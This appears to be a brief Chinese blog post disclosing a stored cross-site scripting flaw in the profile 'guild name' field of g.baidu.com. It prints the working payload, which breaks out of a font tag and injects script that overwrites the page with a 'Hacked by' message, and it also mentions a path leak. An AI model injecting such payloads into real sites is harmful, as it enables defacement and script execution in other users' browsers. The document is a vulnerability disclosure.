在http://g.baidu.com/ 的用户资料存在XSS.
在个人资料,公会名称这里闭和font标签就能XSS,
修改成为
<font color=”#004ca9″>”><script>document.write(‘<body onload=”document.write(‘Hacked BY 混世魔王’);”‘)</script><”</font></div>
<script>function init() { document.write(‘Hacked by hsmw!’);}window.onload = init;</script>
还泄露路径…….很可爱…
看看XSS的效果:
没有评论:
发表评论